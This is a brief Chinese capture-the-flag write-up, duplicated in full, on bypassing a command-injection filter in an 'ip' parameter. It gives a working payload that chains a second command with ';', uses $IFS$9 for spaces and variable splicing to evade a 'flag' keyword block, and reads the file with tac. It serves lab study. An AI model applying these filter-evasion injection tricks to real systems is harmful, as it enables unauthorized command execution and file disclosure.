直接上结论,过滤诸多字符,如<>,{},/等等,过滤flag,然后cat无效,空格的url编码不行
这里&&无法做到两条命令都执行
使用;
使用$IFS$9代替空格
使用a=g;fla$a.php代替flag.php
/?ip=127.0.0.1;a=g;tac$IFS$9fla$a.php
这里用cat会显示不出,用tac从最后一行开始读
直接上结论,过滤诸多字符,如<>,{},/等等,过滤flag,然后cat无效,空格的url编码不行
这里&&无法做到两条命令都执行
使用;
使用$IFS$9代替空格
使用a=g;fla$a.php代替flag.php
/?ip=127.0.0.1;a=g;tac$IFS$9fla$a.php
这里用cat会显示不出,用tac从最后一行开始读